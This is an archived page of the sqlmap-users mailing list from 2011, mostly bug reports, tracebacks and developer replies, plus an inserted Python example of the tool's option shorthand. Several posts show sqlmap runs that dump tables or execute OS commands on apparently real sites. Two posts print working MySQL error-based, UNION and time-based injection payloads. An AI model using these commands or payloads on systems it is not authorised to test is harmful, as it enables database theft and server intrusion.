sqlmap-users Mailing List for sqlmap (Page 91)
From: <bu...@gm...> - 2011-06-15 23:10:58
Ryan Sears wrote:
> There's a few different options that I basically ALWAYS use

What about setting up an alias?

alias sqlmap='sqlmap --z "ra,le=5,ri=3..."'

From: Ryan S. <rd...@mt...> - 2011-06-15 22:37:30
Nice! That seems like a nifty feature for sure!

I'm also a bit confused on the config files, maybe you can clarify? Even when I specify -C sqlmap.conf it doesn't seem to be honoring the options I have set. There's a few different options that I basically ALWAYS use, and it'd be nice to have it just permanently turn on things like --random-agent, as well as risk/level parameters as well. Who knows, I could just be missing something...

Also I noticed that no matter how many threads you specify (<3) it sticks it to 3 no matter what, anyone else noticing it?

Thanks, and as always great work guys :-D

Ryan

----- Original Message -----
From: "Miroslav Stampar" <mir...@gm...>
To: "SqlMap List" <sql...@li...>
Sent: Wednesday, June 15, 2011 7:55:45 AM GMT -05:00 US/Canada Eastern
Subject: [sqlmap-users] New feature: mnemonics

Hi boys and girls.

We are introducing new (experimental) feature called mnemonics (-z option). All of you who are a hard core users of sqlmap and/or you are tired of writing down long sausages in sqlmap's command line you could enjoy this one.

Comparison:

A) normal
./sqlmap.py --batch --banner --dump -D=testdb -T=users --technique=E -u="http://xxx.xxx.xxx.xxx/sqlmap/mysql/get_int.php?id=1"

B1) with mnemonics
./sqlmap.py -u "http://xxx.xxx.xxx.xxx/sqlmap/mysql/get_int.php?id=1" -z "bat,ban,du,D=testdb,T=users,tec=E"

B2) with mnemonics
./sqlmap.py -u "http://xxx.xxx.xxx.xxx/sqlmap/mysql/get_int.php?id=1" --batch --dump -z "ban,D=testdb,T=users,tec=E"

C) possible real life example:
./sqlmap.py -u "http://.....?id=1" -z "bat,ban,to,ra,le=3,ri=3"
instead of:
./sqlmap.py -u "http://.....?id=1" --batch --banner --tor --random-agent --level=3 --risk=3
(one of many possible equivalents is e.g.: ./sqlmap.py -u "http://.....?id=1" -z "bat,bann,tor,rand,lev=3,ri=3")

Trick is that you are writing as shorter names as possible of wanted parameters. Mnemonics are splitted with ',' char and values are explicitly set (if needed) by writing equation mark. In case of ambiguities parameter with the shortest name will be used (e.g. du will be resolved to dump because dump is shorter than dump-all)

This is all prone to changes and we are opened for suggestions.

KR

--
Miroslav Stampar
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B

From: Joseph S. <jos...@gm...> - 2011-06-15 19:40:23
I keep getting this error when trying to update.

sqlmap version: 0.9 (r3630)
Python version: 2.6.5
Operating system: posix
Command line: sqlmap.py --update
Technique: None
Back-end DBMS: None (identified)
Traceback (most recent call last):
  File "sqlmap.py", line 74, in main
    dataToStdout("[*] starting at %s\n\n" % time.strftime("%X"), forceOutput=True)
  File "/pentest/database/sqlmap/lib/core/option.py", line 1590, in init
    update()
  File "/pentest/database/sqlmap/lib/core/update.py", line 71, in update
    client.update(rootDir)
ClientError: callback_get_login required

From: Miroslav S. <mir...@gm...> - 2011-06-15 18:47:32
hi Olu.

you are right. we haven't noticed, but support for Sybase was seriously limited due to this bug. now you can freely dump tables (no need for -C to explicitly state the columns as --columns was crippled and fixed too) on Sybase.

kr

On Tue, Jun 14, 2011 at 10:32 PM, Olu Akindeinde <sey...@gm...> wrote:
> Hi again,
> Why is it sometimes difficult to enumerate columns (-C 'column name') in
> sqlmap. I have noticed this especially with column extraction of Sybase
> databases. I have tried to extract table columns on at least three Sybase
> database backend servers and they all come up short. All other forms of
> enumerations work (-D, -T including --columns). I have even tried to run
> SELECT statements via the --sql-shell option but it comes up with absolutely
> no data. This hardly happens on MySQL or MSSQL. The error i keep getting is
>
> [WARNING] unable to enumerate the columns for table 'TABLE' on database
> 'DB', skipping
> [INFO] you can find results of scanning in multiple targets mode inside the
> CSV file '/Users/fx/sqlmap/output/results-06142011_0635pm.csv'
>
> I'm I getting something wrong?
> Thanks again for a truly capable tool.
> Olu

--
Miroslav Stampar
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B

From: Miroslav S. <mir...@gm...> - 2011-06-15 11:55:52
Hi boys and girls.

We are introducing a new (experimental) feature called mnemonics (-z option). All of you who are hard core users of sqlmap and/or are tired of writing down long sausages in sqlmap's command line could enjoy this one.

Comparison:

A) normal
./sqlmap.py --batch --banner --dump -D=testdb -T=users --technique=E -u="http://xxx.xxx.xxx.xxx/sqlmap/mysql/get_int.php?id=1"

B1) with mnemonics
./sqlmap.py -u "http://xxx.xxx.xxx.xxx/sqlmap/mysql/get_int.php?id=1" -z "bat,ban,du,D=testdb,T=users,tec=E"

B2) with mnemonics
./sqlmap.py -u "http://xxx.xxx.xxx.xxx/sqlmap/mysql/get_int.php?id=1" --batch --dump -z "ban,D=testdb,T=users,tec=E"

C) possible real life example:
./sqlmap.py -u "http://.....?id=1" -z "bat,ban,to,ra,le=3,ri=3"
instead of:
./sqlmap.py -u "http://.....?id=1" --batch --banner --tor --random-agent --level=3 --risk=3
(one of many possible equivalents is e.g.: ./sqlmap.py -u "http://.....?id=1" -z "bat,bann,tor,rand,lev=3,ri=3")

The trick is that you write the names of the wanted parameters as short as possible. Mnemonics are split with the ',' char and values are explicitly set (if needed) by writing an equation mark. In case of ambiguities the parameter with the shortest name will be used (e.g. du will be resolved to dump because dump is shorter than dump-all).

This is all prone to changes and we are open to suggestions.

KR

--
Miroslav Stampar
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B

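The resolution rules described in the post above (comma-separated abbreviations, '=' for values, shortest name wins on ambiguity), as an added Python example that is not part of the original post and not sqlmap's own code. The OPTIONS table is a constructed subset of the option names quoted on this page, and candidates/resolve/expand are hypothetical helper names.

```python
# Added illustration of the mnemonic rules from the post; not sqlmap's code.
# Assumption: only options that appear in this thread are modelled.
# True means the option takes a value, False means it is a plain switch.
OPTIONS = {
    "batch": False, "banner": False, "dump": False, "dump-all": False,
    "tor": False, "random-agent": False,
    "level": True, "risk": True, "technique": True, "threads": True,
    "D": True, "T": True,
}


class MnemonicError(ValueError):
    """Raised when an abbreviation cannot be expanded safely."""


def candidates(name, options=OPTIONS):
    """All option names that start with the abbreviation, shortest first."""
    if not name:
        raise MnemonicError("empty mnemonic")
    # Matching is case-sensitive, so "T" (table) never collides with "tor".
    hits = [opt for opt in options if opt.startswith(name)]
    # Length first (the rule from the post), then alphabetical so that
    # equal-length names always resolve the same way.
    return sorted(hits, key=lambda opt: (len(opt), opt))


def resolve(name, options=OPTIONS):
    """Full option name for one abbreviation: the shortest match wins."""
    hits = candidates(name, options)
    if not hits:
        raise MnemonicError("no option starts with %r" % name)
    return hits[0]


def expand(mnemonics, options=OPTIONS):
    """Expand a -z style string into the equivalent argument list."""
    argv = []
    for item in mnemonics.split(","):
        item = item.strip()
        if not item:
            continue
        name, sep, value = item.partition("=")
        full = resolve(name, options)
        takes_value = options[full]
        if takes_value and not (sep and value):
            raise MnemonicError("%s needs a value" % full)
        if not takes_value and sep:
            raise MnemonicError("%s does not take a value" % full)
        if len(full) == 1:              # short option such as -D or -T
            argv.extend(["-" + full, value])
        elif takes_value:
            argv.append("--%s=%s" % (full, value))
        else:
            argv.append("--" + full)
    return argv


if __name__ == "__main__":
    # The -z strings below are the ones quoted in the post.
    for z in ("bat,ban,du,D=testdb,T=users,tec=E",
              "bat,ban,to,ra,le=3,ri=3",
              "bat,bann,tor,rand,lev=3,ri=3"):
        print("%-36s -> %s" % (z, " ".join(expand(z))))
    # Abbreviations with more than one match resolve silently, so it is
    # worth listing them before relying on a saved alias.
    for short in ("du", "t", "b"):
        print("%-3s matches %s" % (short, candidates(short)))
```

Because an ambiguous abbreviation resolves silently, printing the expanded argument list before a run confirms that the level, risk and dump options are the ones agreed for the engagement.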
From: Olu A. <sey...@gm...> - 2011-06-14 20:32:45
Hi again,

Why is it sometimes difficult to enumerate columns (-C 'column name') in sqlmap? I have noticed this especially with column extraction of Sybase databases. I have tried to extract table columns on at least three Sybase database backend servers and they all come up short. All other forms of enumerations work (-D, -T including --columns). I have even tried to run SELECT statements via the --sql-shell option but it comes up with absolutely no data. This hardly happens on MySQL or MSSQL. The error I keep getting is

[WARNING] unable to enumerate the columns for table 'TABLE' on database 'DB', skipping
[INFO] you can find results of scanning in multiple targets mode inside the CSV file '/Users/fx/sqlmap/output/results-06142011_0635pm.csv'

Am I getting something wrong?
Thanks again for a truly capable tool.
Olu

From: Miroslav S. <mir...@gm...> - 2011-06-14 08:38:04
hi Olu.

thank you for your report and find it fixed in the latest commit. nevertheless, if you experience some more problems while retrieving data you can freely contact me privately with some more details.

kr

On Tue, Jun 14, 2011 at 9:24 AM, Olu Akindeinde <sey...@gm...> wrote:
>
> Hi,
> Sqlmap gave this critical error
> Thanks
>>
>> sqlmap version: 1.0-dev (r4077)
>> Python version: 2.6.1
>> Operating system: posix
>> Command line: ./sqlmap.py -u http://www.abc.com/rp.jsp?uname= --thread=10
>> -v 3 --dump -D database -T table --parse-errors --fresh-queries
>> Technique: TIME
>> Back-end DBMS: Sybase (fingerprinted)
>> Traceback (most recent call last):
>> File "./sqlmap.py", line 85, in main
>> start()
>> File "/Users/fx/sqlmap/lib/controller/controller.py", line 541, in start
>> action()
>> File "/Users/fx/sqlmap/lib/controller/action.py", line 109, in action
>> conf.dbmsHandler.dumpTable()
>> File "/Users/fx/sqlmap/plugins/generic/enumeration.py", line 1479, in
>> dumpTable
>> self.getColumns(onlyColNames=True)
>> File "/Users/fx/sqlmap/plugins/dbms/sybase/enumeration.py", line 220, in
>> getColumns
>> columns[name] = sybaseTypes[type_] if type_ else None
>> KeyError: u'A'
>>

--
Miroslav Stampar
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B

From: Olu A. <sey...@gm...> - 2011-06-14 07:24:36
Hi,
Sqlmap gave this critical error
Thanks

> sqlmap version: 1.0-dev (r4077)
> Python version: 2.6.1
> Operating system: posix
> Command line: ./sqlmap.py -u http://www.abc.com/rp.jsp?uname= --thread=10
> -v 3 --dump -D database -T table --parse-errors --fresh-queries
> Technique: TIME
> Back-end DBMS: Sybase (fingerprinted)
> Traceback (most recent call last):
> File "./sqlmap.py", line 85, in main
> start()
> File "/Users/fx/sqlmap/lib/controller/controller.py", line 541, in start
> action()
> File "/Users/fx/sqlmap/lib/controller/action.py", line 109, in action
> conf.dbmsHandler.dumpTable()
> File "/Users/fx/sqlmap/plugins/generic/enumeration.py", line 1479, in
> dumpTable
> self.getColumns(onlyColNames=True)
> File "/Users/fx/sqlmap/plugins/dbms/sybase/enumeration.py", line 220, in
> getColumns
> columns[name] = sybaseTypes[type_] if type_ else None
> KeyError: u'A'

From: Bernardo D. A. G. <ber...@gm...> - 2011-06-13 18:43:57
It's the dumbest article on SQL injection ever. There's nothing that deserves a read in there. Unfortunately, I lost those 10 minutes of life.

Reasons?

1. The technique is non deterministic. It's not new. It takes way longer than a proper bisection algorithm.
2. A bisection algorithm worked on the ASCII() representation of the SUBSTR() of the query is way better than a heuristic regexp "guess".
3. The examples in the paper are actually weak and refer to very outdated techniques to do time-based - They explain BENCHMARK() for MySQL where since 5.0.12 there's builtin SLEEP() and do the time-based on MSSQL with heavy queries, where since MSSQL 7.0 or 2000 we have waitfor delay.

Bernardo

On 13 June 2011 19:37, Andres Riancho <and...@gm...> wrote:
> FYI. Would be a nice to have in sqlmap :)
>
>
> ---------- Forwarded message ----------
> From: R00T_ATI <r00...@ih...>
> Date: Sun, Jun 12, 2011 at 2:45 PM
> Subject: [Full-disclosure] Blind Sql Injection With Regular Expression
> To: ful...@li...
>
>
> New and fast attack for blind sql injection.
>
> http://www.ihteam.net/papers/blind-sqli-regexp-attack.pdf
>
> --
> Andrés Riancho
> Director of Web Security at Rapid7 LLC
> Founder at Bonsai Information Security
> Project Leader at w3af

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable

From: Andres R. <and...@gm...> - 2011-06-13 18:38:10
FYI. Would be a nice to have in sqlmap :)

---------- Forwarded message ----------
From: R00T_ATI <r00...@ih...>
Date: Sun, Jun 12, 2011 at 2:45 PM
Subject: [Full-disclosure] Blind Sql Injection With Regular Expression
To: ful...@li...

New and fast attack for blind sql injection.

http://www.ihteam.net/papers/blind-sqli-regexp-attack.pdf

--
Andrés Riancho
Director of Web Security at Rapid7 LLC
Founder at Bonsai Information Security
Project Leader at w3af

From: Miroslav S. <mir...@gm...> - 2011-06-11 07:52:40
hi Kirill.

thank you for your report and find it fixed in the latest commit.

kr

On Sat, Jun 11, 2011 at 9:00 AM, Kirill Morozov <l0...@l0...> wrote:
> Hello,
> this is not an error, just look :)
> Last time when i used "--os-cmd whoami" with mssql, i got:
> [11:00:08] [INFO] retrieved: nt authority\\network service\n
> command standard output:
> ---
> nt authority
> etwork service
> ---
> first char was interpreted as new line :)
> --
> Kirill Morozov
> KIMO2-RIPE, RHCE

--
Miroslav Stampar
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B

From: Kirill M. <l0...@l0...> - 2011-06-11 07:08:01
Hello,
this is not an error, just look :)
Last time when I used "--os-cmd whoami" with mssql, I got:

[11:00:08] [INFO] retrieved: nt authority\\network service\n
command standard output:
---
nt authority
etwork service
---

first char was interpreted as new line :)

--
Kirill Morozov
KIMO2-RIPE, RHCE

From: Miroslav S. <mir...@gm...> - 2011-06-09 19:38:46
hi Jeremy.

well, Basic and other supported authentications should reauthenticate automatically as you already know. web authentication is supported via cookies which you are probably using if i am not mistaken. doing plain web authentication is not supported out of the box because every authentication form has its own parameters that need to be supplied (not standardized).

now, we are open to suggestions. we can support this kind of things that you require but we need some generic approach. for example, we could support one more type of authorization where if there is a form with stated parameter names there sqlmap could automatically fill them and send them.

kr

On Thu, Jun 9, 2011 at 5:19 PM, Jeremy Mendiola <vi...@gm...> wrote:
> Hi,
>
> during my pentests I've found several Blind SQL Injection that could be
> exploited just by authenticated users (I obviously mean web authentication
> not NTLM/Basic authentication).
> In most of these cases, a FALSE boolean response of a sql injection logged
> the user off, and I needed re-authenticate to launch the exploit again. Is
> there a way to configure sqlmap to re-authenticate automatically in case of
> a FALSE response? Some sort of a two step injection (authentication +
> injection) in particular cases (eg. FALSE response)?
>
> Best regards,
>
> Jeremy

--
Miroslav Stampar
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B

From: Jeremy M. <vi...@gm...> - 2011-06-09 15:19:42
Hi,

during my pentests I've found several Blind SQL Injection that could be exploited just by authenticated users (I obviously mean web authentication not NTLM/Basic authentication).
In most of these cases, a FALSE boolean response of a sql injection logged the user off, and I needed to re-authenticate to launch the exploit again. Is there a way to configure sqlmap to re-authenticate automatically in case of a FALSE response? Some sort of a two step injection (authentication + injection) in particular cases (e.g. FALSE response)?

Best regards,

Jeremy

From: Bernardo D. A. G. <ber...@gm...> - 2011-06-08 23:29:06
Fixed now. Thanks for reporting.

Bernardo

2011/6/9 Kazım Buğra Tombul <mha...@gm...>:
> [02:22:47] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4055), retry
> your run with the latest development version from the Subversion repository.
> If the exception persists, please send by e-mail to
> sql...@li... the following text and any information
> required to reproduce the bug. The developers will try to reproduce the bug,
> fix it accordingly and get back to you.
> sqlmap version: 1.0-dev (r4055)
> Python version: 2.7.1
> Operating system: posix
> Command line: /Users/Montserrat/sqlmap-dev/sqlmap.py --random-agent -u
> http://www.sevginehri.net/sarkisozu.asp?sarki=678 --batch
> Technique: UNION
> Back-end DBMS: None (identified)
> Traceback (most recent call last):
> File "/Users/Montserrat/sqlmap-dev/sqlmap.py", line 85, in main
> start()
> File "/Users/Montserrat/sqlmap-dev/lib/controller/controller.py", line
> 444, in start
> injection = checkSqlInjection(place, parameter, value)
> File "/Users/Montserrat/sqlmap-dev/lib/controller/checks.py", line 402, in
> checkSqlInjection
> singleTimeWarnMessage(warnMsg, logging.WARN, title)
> TypeError: singleTimeWarnMessage() takes exactly 1 argument (3 given)
>
> Kazım Buğra Tombul
>
> Senior @ Metu Computer Engineering
> Software Developer @ Speeddate.com, Inc.
> System Administrator @ Metu Computer Club
> Supervisory Board Member @ Metu Computer Club

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable

From: Kazım B. T. <mha...@gm...> - 2011-06-08 23:25:29
[02:22:47] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4055), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev (r4055)
Python version: 2.7.1
Operating system: posix
Command line: /Users/Montserrat/sqlmap-dev/sqlmap.py --random-agent -u http://www.sevginehri.net/sarkisozu.asp?sarki=678 --batch
Technique: UNION
Back-end DBMS: None (identified)
Traceback (most recent call last):
  File "/Users/Montserrat/sqlmap-dev/sqlmap.py", line 85, in main
    start()
  File "/Users/Montserrat/sqlmap-dev/lib/controller/controller.py", line 444, in start
    injection = checkSqlInjection(place, parameter, value)
  File "/Users/Montserrat/sqlmap-dev/lib/controller/checks.py", line 402, in checkSqlInjection
    singleTimeWarnMessage(warnMsg, logging.WARN, title)
TypeError: singleTimeWarnMessage() takes exactly 1 argument (3 given)

Kazım Buğra Tombul
Senior @ Metu Computer Engineering
Software Developer @ Speeddate.com, Inc.
System Administrator @ Metu Computer Club
Supervisory Board Member @ Metu Computer Club

From: Miroslav S. <mir...@gm...> - 2011-06-07 21:50:29
p.s. i can see that that web site is not very responsive. maybe somehow connected to "cenzic 232"

On Tue, Jun 7, 2011 at 11:43 PM, Miroslav Stampar <mir...@gm...> wrote:
> hi Chris.
>
> thank you for your report and find it fixed in the latest commit.
>
> kr
>
> On Tue, Jun 7, 2011 at 10:11 PM, Chris Clements <ccl...@fl...> wrote:
>> [14:33:41] [CRITICAL] unable to connect to the target url or proxy, sqlmap
>> is going to retry the request
>> [14:34:20] [CRITICAL] connection timed out to the target url or proxy,
>> sqlmap is going to retry the request
>> [14:34:51] [CRITICAL] connection timed out to the target url or proxy,
>> sqlmap is going to retry the request
>> [14:34:52] [CRITICAL] unable to connect to the target url or proxy
>> [14:34:52] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4033), retry
>> your run with the latest development version from the Subversion repository.
>> If the exception persists, please send by e-mail
>> to sql...@li... the following text and any information
>> required to reproduce the bug. The developers will try to reproduce the bug,
>> fix it accordingly and get back to you.
>> sqlmap version: 1.0-dev (r4033)
>> Python version: 2.6.1
>> Operating system: posix
>> Command line: ./sqlmap.py --forms --batch --risk 3 --level 5 -o --threads 5
>> -u http://crackme.cenzic.com/Kelev/register/register.php
>> Technique: UNION
>> Back-end DBMS: None (identified)
>> Traceback (most recent call last):
>> File "./sqlmap.py", line 86, in main
>> start()
>> File "/private/var/root/sqlmap/lib/controller/controller.py", line 447, in
>> start
>> injection = checkSqlInjection(place, parameter, value)
>> File "/private/var/root/sqlmap/lib/controller/checks.py", line 335, in
>> checkSqlInjection
>> falseResult = Request.queryPage(genCmpPayload(), place, raise404=False)
>> File "/private/var/root/sqlmap/lib/request/connect.py", line 581, in
>> queryPage
>> elif kb.nullConnection == NULLCONNECTION.RANGE and
>> HTTPHEADER.CONTENT_RANGE in headers:
>> TypeError: argument of type 'NoneType' is not iterable
>> [*] shutting down at: 14:34:52
>> ––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––
>> Chris Clements Security Architect
>> Flat Earth Networking, Inc. 24-Hour Technical Support Line 800-329-0408
>> All we do is computer network security. P: (615) 336-6296 | F: (615)
>> 296-4101
>
> --
> Miroslav Stampar
>
> E-mail: miroslav.stampar (at) gmail.com
> PGP Key ID: 0xB5397B1B

--
Miroslav Stampar
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B

From: Miroslav S. <mir...@gm...> - 2011-06-07 21:43:13
hi Chris.

thank you for your report and find it fixed in the latest commit.

kr

On Tue, Jun 7, 2011 at 10:11 PM, Chris Clements <ccl...@fl...> wrote:
> [14:33:41] [CRITICAL] unable to connect to the target url or proxy, sqlmap
> is going to retry the request
> [14:34:20] [CRITICAL] connection timed out to the target url or proxy,
> sqlmap is going to retry the request
> [14:34:51] [CRITICAL] connection timed out to the target url or proxy,
> sqlmap is going to retry the request
> [14:34:52] [CRITICAL] unable to connect to the target url or proxy
> [14:34:52] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4033), retry
> your run with the latest development version from the Subversion repository.
> If the exception persists, please send by e-mail
> to sql...@li... the following text and any information
> required to reproduce the bug. The developers will try to reproduce the bug,
> fix it accordingly and get back to you.
> sqlmap version: 1.0-dev (r4033)
> Python version: 2.6.1
> Operating system: posix
> Command line: ./sqlmap.py --forms --batch --risk 3 --level 5 -o --threads 5
> -u http://crackme.cenzic.com/Kelev/register/register.php
> Technique: UNION
> Back-end DBMS: None (identified)
> Traceback (most recent call last):
> File "./sqlmap.py", line 86, in main
> start()
> File "/private/var/root/sqlmap/lib/controller/controller.py", line 447, in
> start
> injection = checkSqlInjection(place, parameter, value)
> File "/private/var/root/sqlmap/lib/controller/checks.py", line 335, in
> checkSqlInjection
> falseResult = Request.queryPage(genCmpPayload(), place, raise404=False)
> File "/private/var/root/sqlmap/lib/request/connect.py", line 581, in
> queryPage
> elif kb.nullConnection == NULLCONNECTION.RANGE and
> HTTPHEADER.CONTENT_RANGE in headers:
> TypeError: argument of type 'NoneType' is not iterable
> [*] shutting down at: 14:34:52
> ––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––
> Chris Clements Security Architect
> Flat Earth Networking, Inc. 24-Hour Technical Support Line 800-329-0408
> All we do is computer network security. P: (615) 336-6296 | F: (615)
> 296-4101

--
Miroslav Stampar
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B

From: Chris C. <ccl...@fl...> - 2011-06-07 20:38:06
[14:33:41] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:34:20] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[14:34:51] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[14:34:52] [CRITICAL] unable to connect to the target url or proxy
[14:34:52] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4033), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev (r4033)
Python version: 2.6.1
Operating system: posix
Command line: ./sqlmap.py --forms --batch --risk 3 --level 5 -o --threads 5 -u http://crackme.cenzic.com/Kelev/register/register.php
Technique: UNION
Back-end DBMS: None (identified)
Traceback (most recent call last):
  File "./sqlmap.py", line 86, in main
    start()
  File "/private/var/root/sqlmap/lib/controller/controller.py", line 447, in start
    injection = checkSqlInjection(place, parameter, value)
  File "/private/var/root/sqlmap/lib/controller/checks.py", line 335, in checkSqlInjection
    falseResult = Request.queryPage(genCmpPayload(), place, raise404=False)
  File "/private/var/root/sqlmap/lib/request/connect.py", line 581, in queryPage
    elif kb.nullConnection == NULLCONNECTION.RANGE and HTTPHEADER.CONTENT_RANGE in headers:
TypeError: argument of type 'NoneType' is not iterable
[*] shutting down at: 14:34:52

Chris Clements
Security Architect
Flat Earth Networking, Inc.
24-Hour Technical Support Line 800-329-0408
All we do is computer network security.
P: (615) 336-6296 | F: (615) 296-4101

From: Miroslav S. <mir...@gm...> - 2011-06-07 17:13:56
hi nightman and everybody else.

this was a really nasty bug which prevented proper handling of dumped data after Ctrl+C was pressed. this should be fixed with the last commit (r4034).

kr

On Sun, Jun 5, 2011 at 4:12 PM, <nig...@em...> wrote:
> Hy
>
> I have a problem with data dumping.
>
> When i run this sqlmap -u "http://website.com/vuln.php" --cookie="cookies" --random-agent --retries=6 --level 5 --risk 3 --dump -D database -T table
>
> Place: GET
> Parameter: id
> Type: error-based
> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
> Payload: section=502&action=view_all_albums&id=83389 AND (SELECT 8070 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,115,109,58),(SELECT (CASE WHEN (8070=8070) THEN 1 ELSE 0 END)),CHAR(58,103,103,97,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
>
> Type: UNION query
> Title: MySQL UNION query (NULL) - 11 to 20 columns
> Payload: section=502&action=view_all_albums&id=-5690 UNION ALL SELECT NULL, CONCAT(CHAR(58,106,115,109,58),IFNULL(CAST(CHAR(82,121,113,115,106,81,100,117,77,99) AS CHAR),CHAR(32)),CHAR(58,103,103,97,58)), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
>
> Type: AND/OR time-based blind
> Title: MySQL > 5.0.11 AND time-based blind
> Payload: section=502&action=view_all_albums&id=83389 AND SLEEP(5
>
> sqlmap runs normal shows me the data. Now the Problem when i break up in the middle of dumping sqlmap don´t save the already received data in a csv only the first received data from the DB found in the csv.
>
> if I wait to sqlmap finished the dumping, is all ok and i find all data in the csv. In an earlier version of sqlmap the data from a stoped dumping still found in the csv.
>
> PS i know my english is terrible. But i hope you understand my problem. ;)

--
Miroslav Stampar
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B

From: Miroslav S. <mir...@gm...> - 2011-06-07 10:30:56
|
hi again.

from now on threads shouldn't cause this kind of mess. with the last commit they are going to be silently killed - in your case that would mean that they'll just handle the bandwidth to others.

kr

On Tue, Jun 7, 2011 at 8:00 AM, Miroslav Stampar <mir...@gm...> wrote:
> hi nightman.
>
> well, it's not really a bug:
> "[04:53:24] [WARNING] if the problem persists please try to lower the number of used threads (--threads)"
>
> i know that you've already used low number of threads (3) but it seems that you have some connection issues with your host. so, i am not sure how we could help :)
>
> kr
>
> On Tue, Jun 7, 2011 at 5:21 AM, <nig...@em...> wrote:
>> This Bug is from my laptops sqlmap with python 2.7 The other problem is on another PC with still python 2.6 ;)
>>
>> sqlmap -u "http://website.com/feed.php?s=os&p=48693" --random-agent --retries=6 --level 5 --risk 3 --common-tables -D Database
>>
>> Place: GET
>> Parameter: s
>>     Type: boolean-based blind
>>     Title: AND boolean-based blind - WHERE or HAVING clause
>>     Payload: s=os' AND 611=611 AND 'oBcE'='oBcE&p=48693
>>
>>     Type: UNION query
>>     Title: MySQL UNION query (NULL) - 1 to 10 columns
>>     Payload: s=os' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,99,112,106,58),CHAR(108,106,75,100,77,106,84,75,97,86),CHAR(58,119,106,120,58)), NULL, NULL, NULL# AND 'sOCX'='sOCX&p=48693
>> ---
>>
>> [04:52:32] [INFO] manual usage of GET payloads requires url encoding
>> [04:52:32] [INFO] the back-end DBMS is MySQL
>>
>> web application technology: PHP 4.4.0, Apache 1.3.33
>> back-end DBMS: MySQL 4
>> [04:52:32] [INFO] checking table existence using items from 'C:\pentest\p\sqlmap.0.9-1\txt\common-tables.txt'
>> [04:52:32] [INFO] adding words used on web page to the check list
>> please enter number of threads? [Enter for 1 (current)] 3
>> [04:52:40] [WARNING] if the problem persists with 'None' values please try to use hidden switch --no-cast (fixing problems with some collation issues)
>> [04:53:23] [INFO] tried 74/3452 items (2%)[04:53:24] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
>> [04:53:24] [WARNING] if the problem persists please try to lower the number of used threads (--threads)
>> [04:53:38] [INFO] tried 88/3452 items (3%)
>> [04:53:39] [WARNING] user aborted during common table existence check. sqlmap will display some tables only
>> Exception in thread 1:
>> Traceback (most recent call last):
>>   File "C:\Python27\lib\threading.py", line 532, in __bootstrap_inner
>>     self.run()
>>   File "C:\Python27\lib\threading.py", line 485, in run
>>     self.__target(*self.__args, **self.__kwargs)
>>   File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\brute\use.py", line 76, in tableExistsThread
>>     result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %d FROM %s)", (randomInt(1), fullTableName)))
>>   File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 519, in checkBooleanExpression
>>     value = getValue(unescaper.unescape(expression), expected=EXPECTED.BOOL, suppressOutput=True, expectingNone=expectingNone)
>>   File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 432, in getValue
>>     value = __goInband(forgeCaseExpression, expected, sort, resumeValue, unpack, dump)
>>   File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 386, in __goInband
>>     output = unionUse(expression, unpack=unpack, dump=dump)
>>   File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line 354, in unionUse
>>     value = __oneShotUnionUse(expression, unpack)
>>   File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line 72, in __oneShotUnionUse
>>     page, headers = Request.queryPage(payload, content=True, raise404=False)
>>   File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 585, in queryPage
>>     page, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
>>   File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 439, in getPage
>>     raise sqlmapConnectionException, warnMsg
>> sqlmapConnectionException: unable to connect to the target url or proxy
>>
>> Exception in thread 2:
>> Traceback (most recent call last):
>>   File "C:\Python27\lib\threading.py", line 532, in __bootstrap_inner
>>     self.run()
>>   File "C:\Python27\lib\threading.py", line 485, in run
>>     self.__target(*self.__args, **self.__kwargs)
